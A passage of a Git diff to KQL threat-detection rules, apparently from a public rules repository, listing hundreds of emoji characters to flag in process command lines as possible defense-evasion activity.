"👆🏾" or ProcessCommandLine contains "🖕🏾" or ProcessCommandLine contains "👇🏾" or ProcessCommandLine contains "☝🏾" or ProcessCommandLine contains "👍🏾" or ProcessCommandLine contains "👎🏾" or ProcessCommandLine contains "✊🏾" or ProcessCommandLine contains "👊🏾" or ProcessCommandLine contains "🤛🏾" or ProcessCommandLine contains "🤜🏾" or ProcessCommandLine contains "👏🏾" or ProcessCommandLine contains "🫶🏾" or ProcessCommandLine contains "🙌🏾" or ProcessCommandLine contains "👐🏾" or ProcessCommandLine contains "🤲🏾" or ProcessCommandLine contains "🙏🏾" or ProcessCommandLine contains "✍🏾" or ProcessCommandLine contains "💪🏾" or ProcessCommandLine contains "🦵🏾" or ProcessCommandLine contains "🦶🏾" or ProcessCommandLine contains "👂🏾" or ProcessCommandLine contains "🦻🏾" or ProcessCommandLine contains "👃🏾" or ProcessCommandLine contains "👶🏾" or ProcessCommandLine contains "👧🏾" or ProcessCommandLine contains "🧒🏾" or ProcessCommandLine contains "👦🏾" or ProcessCommandLine contains "👩🏾" or ProcessCommandLine contains "🧑🏾" or ProcessCommandLine contains "👨🏾" or ProcessCommandLine contains "👩🏾‍🦱" or ProcessCommandLine contains "🧑🏾‍🦱" or ProcessCommandLine contains "👨🏾‍🦱" or ProcessCommandLine contains "👩🏾‍🦰" or ProcessCommandLine contains "🧑🏾‍🦰" or ProcessCommandLine contains "👨🏾‍🦰" or ProcessCommandLine contains "👱🏾‍♀️" or ProcessCommandLine contains "👱🏾" or ProcessCommandLine contains "👱🏾‍♂️" or ProcessCommandLine contains "👩🏾‍🦳" or ProcessCommandLine contains "🧑🏾‍🦳" or ProcessCommandLine contains "👨🏾‍🦳" or ProcessCommandLine contains "👩🏾‍🦲" or ProcessCommandLine contains "🧑🏾‍🦲" or ProcessCommandLine contains "👨🏾‍🦲" or ProcessCommandLine contains "🧔🏾‍♀️" or ProcessCommandLine contains "🧔🏾" or ProcessCommandLine contains "🧔🏾‍♂️" or ProcessCommandLine contains "👵🏾" or ProcessCommandLine contains "🧓🏾" or ProcessCommandLine contains "👴🏾" or ProcessCommandLine contains "👲🏾" or ProcessCommandLine contains "👳🏾‍♀️" or ProcessCommandLine contains "👳🏾" or ProcessCommandLine contains "👳🏾‍♂️" or 
ProcessCommandLine contains "🧕🏾" or ProcessCommandLine contains "👮🏾‍♀️" or ProcessCommandLine contains "👮🏾" or ProcessCommandLine contains "👮🏾‍♂️" or ProcessCommandLine contains "👷🏾‍♀️" or ProcessCommandLine contains "👷🏾" or ProcessCommandLine contains "👷🏾‍♂️" or ProcessCommandLine contains "💂🏾‍♀️" or ProcessCommandLine contains "💂🏾" or ProcessCommandLine contains "💂🏾‍♂️" or ProcessCommandLine contains "🕵🏾‍♀️" or ProcessCommandLine contains "🕵🏾" or ProcessCommandLine contains "🕵🏾‍♂️" or ProcessCommandLine contains "👩🏾‍⚕️" or ProcessCommandLine contains "🧑🏾‍⚕️" or ProcessCommandLine contains "👨🏾‍⚕️" or ProcessCommandLine contains "👩🏾‍🌾" or ProcessCommandLine contains "🧑🏾‍🌾" or ProcessCommandLine contains "👨🏾‍🌾" or ProcessCommandLine contains "👩🏾‍🍳" or ProcessCommandLine contains "🧑🏾‍🍳" or ProcessCommandLine contains "👨🏾‍🍳" or ProcessCommandLine contains "👩🏾‍🎓" or ProcessCommandLine contains "🧑🏾‍🎓" or ProcessCommandLine contains "👨🏾‍🎓" or ProcessCommandLine contains "👩🏾‍🎤" or ProcessCommandLine contains "🧑🏾‍🎤" or ProcessCommandLine contains "👨🏾‍🎤" or ProcessCommandLine contains "👩🏾‍🏫" or ProcessCommandLine contains "🧑🏾‍🏫" or ProcessCommandLine contains "👨🏾‍🏫" or ProcessCommandLine contains "👩🏾‍🏭" or ProcessCommandLine contains "🧑🏾‍🏭" or ProcessCommandLine contains "👨🏾‍🏭" or ProcessCommandLine contains "👩🏾‍💻" or ProcessCommandLine contains "🧑🏾‍💻" or ProcessCommandLine contains "👨🏾‍💻" or ProcessCommandLine contains "👩🏾‍💼" or ProcessCommandLine contains "🧑🏾‍💼" or ProcessCommandLine contains "👨🏾‍💼" or ProcessCommandLine contains "👩🏾‍🔧" or ProcessCommandLine contains "🧑🏾‍🔧" or ProcessCommandLine contains "👨🏾‍🔧" or ProcessCommandLine contains "👩🏾‍🔬" or ProcessCommandLine contains "🧑🏾‍🔬" or ProcessCommandLine contains "👨🏾‍🔬" or ProcessCommandLine contains "👩🏾‍🎨" or ProcessCommandLine contains "🧑🏾‍🎨" or ProcessCommandLine contains "👨🏾‍🎨" or ProcessCommandLine contains "👩🏾‍🚒" or ProcessCommandLine contains "🧑🏾‍🚒" or ProcessCommandLine contains "👨🏾‍🚒" or ProcessCommandLine 
contains "👩🏾‍✈️" or ProcessCommandLine contains "🧑🏾‍✈️" or ProcessCommandLine contains "👨🏾‍✈️" or ProcessCommandLine contains "👩🏾‍🚀" or ProcessCommandLine contains "🧑🏾‍🚀" or ProcessCommandLine contains "👨🏾‍🚀" or ProcessCommandLine contains "👩🏾‍⚖️" or ProcessCommandLine contains "🧑🏾‍⚖️" or ProcessCommandLine contains "👨🏾‍⚖️" or ProcessCommandLine contains "👰🏾‍♀️" or ProcessCommandLine contains "👰🏾" or ProcessCommandLine contains "👰🏾‍♂️" or ProcessCommandLine contains "🤵🏾‍♀️" or ProcessCommandLine contains "🤵🏾" or ProcessCommandLine contains "🤵🏾‍♂️" or ProcessCommandLine contains "👸🏾" or ProcessCommandLine contains "🫅🏾" or ProcessCommandLine contains "🤴🏾" or ProcessCommandLine contains "🥷🏾" or ProcessCommandLine contains "🦸🏾‍♀️" or ProcessCommandLine contains "🦸🏾" or ProcessCommandLine contains "🦸🏾‍♂️" or ProcessCommandLine contains "🦹🏾‍♀️" or ProcessCommandLine contains "🦹🏾" or ProcessCommandLine contains "🦹🏾‍♂️" or ProcessCommandLine contains "🤶🏾" or ProcessCommandLine contains "🧑🏾‍🎄" or ProcessCommandLine contains "🎅🏾" or ProcessCommandLine contains "🧙🏾‍♀️" or ProcessCommandLine contains "🧙🏾" or ProcessCommandLine contains "🧙🏾‍♂️" or ProcessCommandLine contains "🧝🏾‍♀️" or ProcessCommandLine contains "🧝🏾" or ProcessCommandLine contains "🧝🏾‍♂️" or ProcessCommandLine contains "🧛🏾‍♀️" or ProcessCommandLine contains "🧛🏾" or ProcessCommandLine contains "🧛🏾‍♂️" or ProcessCommandLine contains "🧜🏾‍♀️" or ProcessCommandLine contains "🧜🏾" or ProcessCommandLine contains "🧜🏾‍♂️" or ProcessCommandLine contains "🧚🏾‍♀️" or ProcessCommandLine contains "🧚🏾" or ProcessCommandLine contains "🧚🏾‍♂️" or ProcessCommandLine contains "👼🏾" or ProcessCommandLine contains "🤰🏾" or ProcessCommandLine contains "🫄🏾" or ProcessCommandLine contains "🫃🏾" or ProcessCommandLine contains "🤱🏾" or ProcessCommandLine contains "👩🏾‍🍼" or ProcessCommandLine contains "🧑🏾‍🍼" or ProcessCommandLine contains "👨🏾‍🍼" or ProcessCommandLine contains "🙇🏾‍♀️" or ProcessCommandLine contains "🙇🏾" or ProcessCommandLine 
contains "🙇🏾‍♂️" or ProcessCommandLine contains "💁🏾‍♀️" or ProcessCommandLine contains "💁🏾" or ProcessCommandLine contains "💁🏾‍♂️" or ProcessCommandLine contains "🙅🏾‍♀️" or ProcessCommandLine contains "🙅🏾" or ProcessCommandLine contains "🙅🏾‍♂️" or ProcessCommandLine contains "🙆🏾‍♀️" or ProcessCommandLine contains "🙆🏾" or ProcessCommandLine contains "🙆🏾‍♂️" or ProcessCommandLine contains "🙋🏾‍♀️" or ProcessCommandLine contains "🙋🏾" or ProcessCommandLine contains "🙋🏾‍♂️" or ProcessCommandLine contains "🧏🏾‍♀️" or ProcessCommandLine contains "🧏🏾" or ProcessCommandLine contains "🧏🏾‍♂️" or ProcessCommandLine contains "🤦🏾‍♀️" or ProcessCommandLine contains "🤦🏾" or ProcessCommandLine contains "🤦🏾‍♂️" or ProcessCommandLine contains "🤷🏾‍♀️" or ProcessCommandLine contains "🤷🏾" or ProcessCommandLine contains "🤷🏾‍♂️" or ProcessCommandLine contains "🙎🏾‍♀️" or ProcessCommandLine contains "🙎🏾" or ProcessCommandLine contains "🙎🏾‍♂️" or ProcessCommandLine contains "🙍🏾‍♀️" or ProcessCommandLine contains "🙍🏾" or ProcessCommandLine contains "🙍🏾‍♂️" or ProcessCommandLine contains "💇🏾‍♀️" or ProcessCommandLine contains "💇🏾" or ProcessCommandLine contains "💇🏾‍♂️" or ProcessCommandLine contains "💆🏾‍♀️" or ProcessCommandLine contains "💆🏾" or ProcessCommandLine contains "💆🏾‍♂️" or ProcessCommandLine contains "🧖🏾‍♀️" or ProcessCommandLine contains "🧖🏾" or ProcessCommandLine contains "🧖🏾‍♂️" or ProcessCommandLine contains "💃🏾" or ProcessCommandLine contains "🕺🏾" or ProcessCommandLine contains "👩🏾‍🦽" or ProcessCommandLine contains "🧑🏾‍🦽" or ProcessCommandLine contains "👨🏾‍🦽" or ProcessCommandLine contains "👩🏾‍🦼" or ProcessCommandLine contains "🧑🏾‍🦼" or ProcessCommandLine contains "👨🏾‍🦼" or ProcessCommandLine contains "🚶🏾‍♀️" or ProcessCommandLine contains "🚶🏾" or ProcessCommandLine contains "🚶🏾‍♂️" or ProcessCommandLine contains "👩🏾‍🦯" or ProcessCommandLine contains "🧑🏾‍🦯" or ProcessCommandLine contains "👨🏾‍🦯" or ProcessCommandLine contains "🧎🏾‍♀️" or ProcessCommandLine contains "🧎🏾" or 
ProcessCommandLine contains "🧎🏾‍♂️" or ProcessCommandLine contains "🏃🏾‍♀️" or ProcessCommandLine contains "🏃🏾" or ProcessCommandLine contains "🏃🏾‍♂️" or ProcessCommandLine contains "🧍🏾‍♀️" or ProcessCommandLine contains "🧍🏾" or ProcessCommandLine contains "🧍🏾‍♂️" or ProcessCommandLine contains "👭🏾" or ProcessCommandLine contains "🧑🏾‍🤝‍🧑🏾" or ProcessCommandLine contains "👬🏾" or ProcessCommandLine contains "👫🏾" or ProcessCommandLine contains "🧗🏾‍♀️" or ProcessCommandLine contains "🧗🏾" or ProcessCommandLine contains "🧗🏾‍♂️" or ProcessCommandLine contains "🏇🏾" or ProcessCommandLine contains "🏂🏾" or ProcessCommandLine contains "🏌🏾‍♀️" or ProcessCommandLine contains "🏌🏾" or ProcessCommandLine contains "🏌🏾‍♂️" or ProcessCommandLine contains "🏄🏾‍♀️" or ProcessCommandLine contains "🏄🏾" or ProcessCommandLine contains "🏄🏾‍♂️" or ProcessCommandLine contains "🚣🏾‍♀️" or ProcessCommandLine contains "🚣🏾" or ProcessCommandLine contains "🚣🏾‍♂️" or ProcessCommandLine contains "🏊🏾‍♀️" or ProcessCommandLine contains "🏊🏾" or ProcessCommandLine contains "🏊🏾‍♂️" or ProcessCommandLine contains "⛹🏾‍♀️" or ProcessCommandLine contains "⛹🏾" or ProcessCommandLine contains "⛹🏾‍♂️" or ProcessCommandLine contains "🏋🏾‍♀️" or ProcessCommandLine contains "🏋🏾" or ProcessCommandLine contains "🏋🏾‍♂️" or ProcessCommandLine contains "🚴🏾‍♀️" or ProcessCommandLine contains "🚴🏾" or ProcessCommandLine contains "🚴🏾‍♂️" or ProcessCommandLine contains "🚵🏾‍♀️" or ProcessCommandLine contains "🚵🏾" or ProcessCommandLine contains "🚵🏾‍♂️" or ProcessCommandLine contains "🤸🏾‍♀️" or ProcessCommandLine contains "🤸🏾" or ProcessCommandLine contains "🤸🏾‍♂️" or ProcessCommandLine contains "🤽🏾‍♀️" or ProcessCommandLine contains "🤽🏾" or ProcessCommandLine contains "🤽🏾‍♂️" or ProcessCommandLine contains "🤾🏾‍♀️" or ProcessCommandLine contains "🤾🏾" or ProcessCommandLine contains "🤾🏾‍♂️" or ProcessCommandLine contains "🤹🏾‍♀️" or ProcessCommandLine contains "🤹🏾" or ProcessCommandLine contains "🤹🏾‍♂️" or ProcessCommandLine contains 
"🧘🏾‍♀️" or ProcessCommandLine contains "🧘🏾" or ProcessCommandLine contains "🧘🏾‍♂️" or ProcessCommandLine contains "🛀🏾" or ProcessCommandLine contains "🛌🏾" or ProcessCommandLine contains "👋🏿" or ProcessCommandLine contains "🤚🏿" or ProcessCommandLine contains "🖐🏿" or ProcessCommandLine contains "✋🏿" or ProcessCommandLine contains "🖖🏿" or ProcessCommandLine contains "👌🏿" or ProcessCommandLine contains "🤌🏿" or ProcessCommandLine contains "🤏🏿" or ProcessCommandLine contains "✌🏿" or ProcessCommandLine contains "🤞🏿" or ProcessCommandLine contains "🫰🏿" or ProcessCommandLine contains "🤟🏿" or ProcessCommandLine contains "🤘🏿" or ProcessCommandLine contains "🤙🏿" or ProcessCommandLine contains "🫵🏿" or ProcessCommandLine contains "🫱🏿" or ProcessCommandLine contains "🫲🏿" or ProcessCommandLine contains "🫳🏿" or ProcessCommandLine contains "🫴🏿" or ProcessCommandLine contains "👈🏿" or ProcessCommandLine contains "👉🏿" or ProcessCommandLine contains "👆🏿" or ProcessCommandLine contains "🖕🏿" or ProcessCommandLine contains "👇🏿" or ProcessCommandLine contains "☝🏿" or ProcessCommandLine contains "👍🏿" or ProcessCommandLine contains "👎🏿" or ProcessCommandLine contains "✊🏿" or ProcessCommandLine contains "👊🏿" or ProcessCommandLine contains "🤛🏿" or ProcessCommandLine contains "🤜🏿" or ProcessCommandLine contains "👏🏿" or ProcessCommandLine contains "🫶🏿" or ProcessCommandLine contains "🙌🏿" or ProcessCommandLine contains "👐🏿" or ProcessCommandLine contains "🤲🏿" or ProcessCommandLine contains "🙏🏿" or ProcessCommandLine contains "✍🏿" or ProcessCommandLine contains "🤳🏿" or ProcessCommandLine contains "💪🏿" or ProcessCommandLine contains "🦵🏿" or ProcessCommandLine contains "🦶🏿" or ProcessCommandLine contains "👂🏿" or ProcessCommandLine contains "🦻🏿" or ProcessCommandLine contains "👃🏿" or ProcessCommandLine contains "👶🏿" or ProcessCommandLine contains "👧🏿" or ProcessCommandLine contains "🧒🏿" or ProcessCommandLine contains "👦🏿" or ProcessCommandLine contains "👩🏿" or ProcessCommandLine contains "🧑🏿" or 
ProcessCommandLine contains "👨🏿" or ProcessCommandLine contains "👩🏿‍🦱" or ProcessCommandLine contains "🧑🏿‍🦱" or ProcessCommandLine contains "👨🏿‍🦱" or ProcessCommandLine contains "👩🏿‍🦰" or ProcessCommandLine contains "🧑🏿‍🦰" or ProcessCommandLine contains "👨🏿‍🦰" or ProcessCommandLine contains "👱🏿‍♀️" or ProcessCommandLine contains "👱🏿" or ProcessCommandLine contains "👱🏿‍♂️" or ProcessCommandLine contains "👩🏿‍🦳" or ProcessCommandLine contains "🧑🏿‍🦳" or ProcessCommandLine contains "👨🏿‍🦳" or ProcessCommandLine contains "👩🏿‍🦲" or ProcessCommandLine contains "🧑🏿‍🦲" or ProcessCommandLine contains "👨🏿‍🦲" or ProcessCommandLine contains "🧔🏿‍♀️" or ProcessCommandLine contains "🧔🏿" or ProcessCommandLine contains "🧔🏿‍♂️" or ProcessCommandLine contains "👵🏿" or ProcessCommandLine contains "🧓🏿" or ProcessCommandLine contains "👴🏿" or ProcessCommandLine contains "👲🏿" or ProcessCommandLine contains "👳🏿‍♀️" or ProcessCommandLine contains "👳🏿" or ProcessCommandLine contains "👳🏿‍♂️" or ProcessCommandLine contains "🧕🏿" or ProcessCommandLine contains "👮🏿‍♀️" or ProcessCommandLine contains "👮🏿" or ProcessCommandLine contains "👮🏿‍♂️" or ProcessCommandLine contains "👷🏿‍♀️" or ProcessCommandLine contains "👷🏿" or ProcessCommandLine contains "👷🏿‍♂️" or ProcessCommandLine contains "💂🏿‍♀️" or ProcessCommandLine contains "💂🏿" or ProcessCommandLine contains "💂🏿‍♂️" or ProcessCommandLine contains "🕵🏿‍♀️" or ProcessCommandLine contains "🕵🏿" or ProcessCommandLine contains "🕵🏿‍♂️" or ProcessCommandLine contains "👩🏿‍⚕️" or ProcessCommandLine contains "🧑🏿‍⚕️" or ProcessCommandLine contains "👨🏿‍⚕️" or ProcessCommandLine contains "👩🏿‍🌾" or ProcessCommandLine contains "🧑🏿‍🌾" or ProcessCommandLine contains "👨🏿‍🌾" or ProcessCommandLine contains "👩🏿‍🍳" or ProcessCommandLine contains "🧑🏿‍🍳" or ProcessCommandLine contains "👨🏿‍🍳" or ProcessCommandLine contains "👩🏿‍🎓" or ProcessCommandLine contains "🧑🏿‍🎓" or ProcessCommandLine contains "👨🏿‍🎓" or ProcessCommandLine contains "👩🏿‍🎤" or ProcessCommandLine contains 
"🧑🏿‍🎤" or ProcessCommandLine contains "👨🏿‍🎤" or ProcessCommandLine contains "👩🏿‍🏫" or ProcessCommandLine contains "🧑🏿‍🏫" or ProcessCommandLine contains "👨🏿‍🏫" or ProcessCommandLine contains "👩🏿‍🏭" or ProcessCommandLine contains "🧑🏿‍🏭" or ProcessCommandLine contains "👨🏿‍🏭" or ProcessCommandLine contains "👩🏿‍💻" or ProcessCommandLine contains "🧑🏿‍💻" or ProcessCommandLine contains "👨🏿‍💻" or ProcessCommandLine contains "👩🏿‍💼" or ProcessCommandLine contains "🧑🏿‍💼" or ProcessCommandLine contains "👨🏿‍💼" or ProcessCommandLine contains "👩🏿‍🔧" or ProcessCommandLine contains "🧑🏿‍🔧" or ProcessCommandLine contains "👨🏿‍🔧" or ProcessCommandLine contains "👩🏿‍🔬" or ProcessCommandLine contains "🧑🏿‍🔬" or ProcessCommandLine contains "👨🏿‍🔬" or ProcessCommandLine contains "👩🏿‍🎨" or ProcessCommandLine contains "🧑🏿‍🎨" or ProcessCommandLine contains "👨🏿‍🎨" or ProcessCommandLine contains "👩🏿‍🚒" or ProcessCommandLine contains "🧑🏿‍🚒" or ProcessCommandLine contains "👨🏿‍🚒" or ProcessCommandLine contains "👩🏿‍✈️" or ProcessCommandLine contains "🧑🏿‍✈️" or ProcessCommandLine contains "👨🏿‍✈️" or ProcessCommandLine contains "👩🏿‍🚀" or ProcessCommandLine contains "🧑🏿‍🚀" or ProcessCommandLine contains "👨🏿‍🚀" or ProcessCommandLine contains "👩🏿‍⚖️" or ProcessCommandLine contains "🧑🏿‍⚖️" or ProcessCommandLine contains "👨🏿‍⚖️" or ProcessCommandLine contains "👰🏿‍♀️" or ProcessCommandLine contains "👰🏿" or ProcessCommandLine contains "👰🏿‍♂️" or ProcessCommandLine contains "🤵🏿‍♀️" or ProcessCommandLine contains "🤵🏿" or ProcessCommandLine contains "🤵🏿‍♂️" or ProcessCommandLine contains "👸🏿" or ProcessCommandLine contains "🫅🏿" or ProcessCommandLine contains "🤴🏿" or ProcessCommandLine contains "🥷🏿" or ProcessCommandLine contains "🦸🏿‍♀️" or ProcessCommandLine contains "🦸🏿" or ProcessCommandLine contains "🦸🏿‍♂️" or ProcessCommandLine contains "🦹🏿‍♀️" or ProcessCommandLine contains "🦹🏿" or ProcessCommandLine contains "🦹🏿‍♂️" or ProcessCommandLine contains "🤶🏿" or ProcessCommandLine contains "🧑🏿‍🎄" or 
ProcessCommandLine contains "🎅🏿" or ProcessCommandLine contains "🧙🏿‍♀️" or ProcessCommandLine contains "🧙🏿" or ProcessCommandLine contains "🧙🏿‍♂️" or ProcessCommandLine contains "🧝🏿‍♀️" or ProcessCommandLine contains "🧝🏿" or ProcessCommandLine contains "🧝🏿‍♂️" or ProcessCommandLine contains "🧛🏿‍♀️" or ProcessCommandLine contains "🧛🏿" or ProcessCommandLine contains "🧛🏿‍♂️" or ProcessCommandLine contains "🧜🏿‍♀️" or ProcessCommandLine contains "🧜🏿" or ProcessCommandLine contains "🧜🏿‍♂️" or ProcessCommandLine contains "🧚🏿‍♀️" or ProcessCommandLine contains "🧚🏿" or ProcessCommandLine contains "🧚🏿‍♂️" or ProcessCommandLine contains "👼🏿" or ProcessCommandLine contains "🤰🏿" or ProcessCommandLine contains "🫄🏿" or ProcessCommandLine contains "🫃🏿" or ProcessCommandLine contains "🤱🏿" or ProcessCommandLine contains "👩🏿‍🍼" or ProcessCommandLine contains "🧑🏿‍🍼" or ProcessCommandLine contains "👨🏿‍🍼" or ProcessCommandLine contains "🙇🏿‍♀️" or ProcessCommandLine contains "🙇🏿" or ProcessCommandLine contains "🙇🏿‍♂️" or ProcessCommandLine contains "💁🏿‍♀️" or ProcessCommandLine contains "💁🏿" or ProcessCommandLine contains "💁🏿‍♂️" or ProcessCommandLine contains "🙅🏿‍♀️" or ProcessCommandLine contains "🙅🏿" or ProcessCommandLine contains "🙅🏿‍♂️" or ProcessCommandLine contains "🙆🏿‍♀️" or ProcessCommandLine contains "🙆🏿" or ProcessCommandLine contains "🙆🏿‍♂️" or ProcessCommandLine contains "🙋🏿‍♀️" or ProcessCommandLine contains "🙋🏿" or ProcessCommandLine contains "🙋🏿‍♂️" or ProcessCommandLine contains "🧏🏿‍♀️" or ProcessCommandLine contains "🧏🏿" or ProcessCommandLine contains "🧏🏿‍♂️" or ProcessCommandLine contains "🤦🏿‍♀️" or ProcessCommandLine contains "🤦🏿" or ProcessCommandLine contains "🤦🏿‍♂️" or ProcessCommandLine contains "🤷🏿‍♀️" or ProcessCommandLine contains "🤷🏿" or ProcessCommandLine contains "🤷🏿‍♂️" or ProcessCommandLine contains "🙎🏿‍♀️" or ProcessCommandLine contains "🙎🏿" or ProcessCommandLine contains "🙎🏿‍♂️" or ProcessCommandLine contains "🙍🏿‍♀️" or ProcessCommandLine contains "🙍🏿" 
or ProcessCommandLine contains "🙍🏿‍♂️" or ProcessCommandLine contains "💇🏿‍♀️" or ProcessCommandLine contains "💇🏿" or ProcessCommandLine contains "💇🏿‍♂️" or ProcessCommandLine contains "💆🏿‍♀️" or ProcessCommandLine contains "💆🏿" or ProcessCommandLine contains "💆🏿‍♂️" or ProcessCommandLine contains "🧖🏿‍♀️" or ProcessCommandLine contains "🧖🏿" or ProcessCommandLine contains "🧖🏿‍♂️" or ProcessCommandLine contains "💃🏿" or ProcessCommandLine contains "🕺🏿" or ProcessCommandLine contains "🕴🏿" or ProcessCommandLine contains "👩🏿‍🦽" or ProcessCommandLine contains "🧑🏿‍🦽" or ProcessCommandLine contains "👨🏿‍🦽" or ProcessCommandLine contains "👩🏿‍🦼" or ProcessCommandLine contains "🧑🏿‍🦼" or ProcessCommandLine contains "👨🏿‍🦼" or ProcessCommandLine contains "🚶🏿‍♀️" or ProcessCommandLine contains "🚶🏿" or ProcessCommandLine contains "🚶🏿‍♂️" or ProcessCommandLine contains "👩🏿‍🦯" or ProcessCommandLine contains "🧑🏿‍🦯" or ProcessCommandLine contains "👨🏿‍🦯" or ProcessCommandLine contains "🧎🏿‍♀️" or ProcessCommandLine contains "🧎🏿" or ProcessCommandLine contains "🧎🏿‍♂️" or ProcessCommandLine contains "🏃🏿‍♀️" or ProcessCommandLine contains "🏃🏿" or ProcessCommandLine contains "🏃🏿‍♂️" or ProcessCommandLine contains "🧍🏿‍♀️" or ProcessCommandLine contains "🧍🏿" or ProcessCommandLine contains "🧍🏿‍♂️" or ProcessCommandLine contains "👭🏿" or ProcessCommandLine contains "🧑🏿‍🤝‍🧑🏿" or ProcessCommandLine contains "👬🏿" or ProcessCommandLine contains "👫🏿" or ProcessCommandLine contains "🧗🏿‍♀️" or ProcessCommandLine contains "🧗🏿" or ProcessCommandLine contains "🧗🏿‍♂️" or ProcessCommandLine contains "🏇🏿" or ProcessCommandLine contains "🏂🏿" or ProcessCommandLine contains "🏌🏿‍♀️" or ProcessCommandLine contains "🏌🏿" or ProcessCommandLine contains "🏌🏿‍♂️" or ProcessCommandLine contains "🏄🏿‍♀️" or ProcessCommandLine contains "🏄🏿" or ProcessCommandLine contains "🏄🏿‍♂️" or ProcessCommandLine contains "🚣🏿‍♀️" or ProcessCommandLine contains "🚣🏿" or ProcessCommandLine contains "🚣🏿‍♂️" or ProcessCommandLine contains 
"🏊🏿‍♀️" or ProcessCommandLine contains "🏊🏿" or ProcessCommandLine contains "🏊🏿‍♂️" or ProcessCommandLine contains "⛹🏿‍♀️" or ProcessCommandLine contains "⛹🏿" or ProcessCommandLine contains "⛹🏿‍♂️" or ProcessCommandLine contains "🏋🏿‍♀️" or ProcessCommandLine contains "🏋🏿" or ProcessCommandLine contains "🏋🏿‍♂️" or ProcessCommandLine contains "🚴🏿‍♀️" or ProcessCommandLine contains "🚴🏿" or ProcessCommandLine contains "🚴🏿‍♂️" or ProcessCommandLine contains "🚵🏿‍♀️" or ProcessCommandLine contains "🚵🏿" or ProcessCommandLine contains "🚵🏿‍♂️" or ProcessCommandLine contains "🤸🏿‍♀️" or ProcessCommandLine contains "🤸🏿" or ProcessCommandLine contains "🤸🏿‍♂️" or ProcessCommandLine contains "🤽🏿‍♀️" or ProcessCommandLine contains "🤽🏿" or ProcessCommandLine contains "🤽🏿‍♂️" or ProcessCommandLine contains "🤾🏿‍♀️" or ProcessCommandLine contains "🤾🏿" or ProcessCommandLine contains "🤾🏿‍♂️" or ProcessCommandLine contains "🤹🏿‍♀️" or ProcessCommandLine contains "🤹🏿" or ProcessCommandLine contains "🤹🏿‍♂️" or ProcessCommandLine contains "🧘🏿‍♀️" or ProcessCommandLine contains "🧘🏿" or ProcessCommandLine contains "🧘🏿‍♂️" or ProcessCommandLine contains "🛀🏿" or ProcessCommandLine contains "🛌🏿" or ProcessCommandLine contains "🐶" or ProcessCommandLine contains "🐱" or ProcessCommandLine contains "🐭" or ProcessCommandLine contains "🐹" or ProcessCommandLine contains "🐰" or ProcessCommandLine contains "🦊" or ProcessCommandLine contains "🐻" or ProcessCommandLine contains "🐼" or ProcessCommandLine contains "🐻‍❄️" or ProcessCommandLine contains "🐨" or ProcessCommandLine contains "🐯" or ProcessCommandLine contains "🦁" or ProcessCommandLine contains "🐮" or ProcessCommandLine contains "🐷" or ProcessCommandLine contains "🐽" or ProcessCommandLine contains "🐸" or ProcessCommandLine contains "🐵" or ProcessCommandLine contains "🙈" or ProcessCommandLine contains "🙉" or ProcessCommandLine contains "🙊" or ProcessCommandLine contains "🐒" or ProcessCommandLine contains "🐔" or ProcessCommandLine contains "🐧" or 
ProcessCommandLine contains "🐦" or ProcessCommandLine contains "🐤" or ProcessCommandLine contains "🐣" or ProcessCommandLine contains "🐥"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_3.kql b/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_3.kql
index 139776a1..4c0221ee 100644
--- a/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_3.kql
+++ b/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_3.kql
@@ -1,10 +1,10 @@
-// Title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 3
-// Author: @Kostastsale, TheDFIRReport
-// Date: 2022-12-05
-// Level: high
-// Description: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-
-DeviceProcessEvents
+// Title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 3
+// Author: @Kostastsale, TheDFIRReport
+// Date: 2022-12-05
+// Level: high
+// Description: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "🦆" or ProcessCommandLine contains "🦅" or ProcessCommandLine contains "🦉" or ProcessCommandLine contains "🦇" or ProcessCommandLine contains "🐺" or ProcessCommandLine contains "🐗" or ProcessCommandLine contains "🐴" or ProcessCommandLine contains "🦄" or ProcessCommandLine contains "🐝" or ProcessCommandLine contains "🪱" or ProcessCommandLine contains "🐛" or ProcessCommandLine contains "🦋" or ProcessCommandLine contains "🐌" or ProcessCommandLine contains "🐞" or ProcessCommandLine contains "🐜" or ProcessCommandLine contains "🪰" or ProcessCommandLine contains "🪲" or ProcessCommandLine contains "🪳" or ProcessCommandLine contains "🦟" or ProcessCommandLine contains "🦗" or ProcessCommandLine contains "🕷" or ProcessCommandLine contains "🕸" or ProcessCommandLine contains "🦂" or ProcessCommandLine contains "🐢" or ProcessCommandLine contains "🐍" or ProcessCommandLine contains "🦎" or ProcessCommandLine contains "🦖" or ProcessCommandLine contains "🦕" or ProcessCommandLine contains "🐙" or ProcessCommandLine contains "🦑" or ProcessCommandLine contains "🦐" or ProcessCommandLine contains "🦞" or ProcessCommandLine contains "🦀" or ProcessCommandLine contains "🪸" or ProcessCommandLine contains "🐡" or 
ProcessCommandLine contains "🐠" or ProcessCommandLine contains "🐟" or ProcessCommandLine contains "🐬" or ProcessCommandLine contains "🐳" or ProcessCommandLine contains "🐋" or ProcessCommandLine contains "🦈" or ProcessCommandLine contains "🐊" or ProcessCommandLine contains "🐅" or ProcessCommandLine contains "🐆" or ProcessCommandLine contains "🦓" or ProcessCommandLine contains "🦍" or ProcessCommandLine contains "🦧" or ProcessCommandLine contains "🦣" or ProcessCommandLine contains "🐘" or ProcessCommandLine contains "🦛" or ProcessCommandLine contains "🦏" or ProcessCommandLine contains "🐪" or ProcessCommandLine contains "🐫" or ProcessCommandLine contains "🦒" or ProcessCommandLine contains "🦘" or ProcessCommandLine contains "🦬" or ProcessCommandLine contains "🐃" or ProcessCommandLine contains "🐂" or ProcessCommandLine contains "🐄" or ProcessCommandLine contains "🐎" or ProcessCommandLine contains "🐖" or ProcessCommandLine contains "🐏" or ProcessCommandLine contains "🐑" or ProcessCommandLine contains "🦙" or ProcessCommandLine contains "🐐" or ProcessCommandLine contains "🦌" or ProcessCommandLine contains "🐕" or ProcessCommandLine contains "🐩" or ProcessCommandLine contains "🦮" or ProcessCommandLine contains 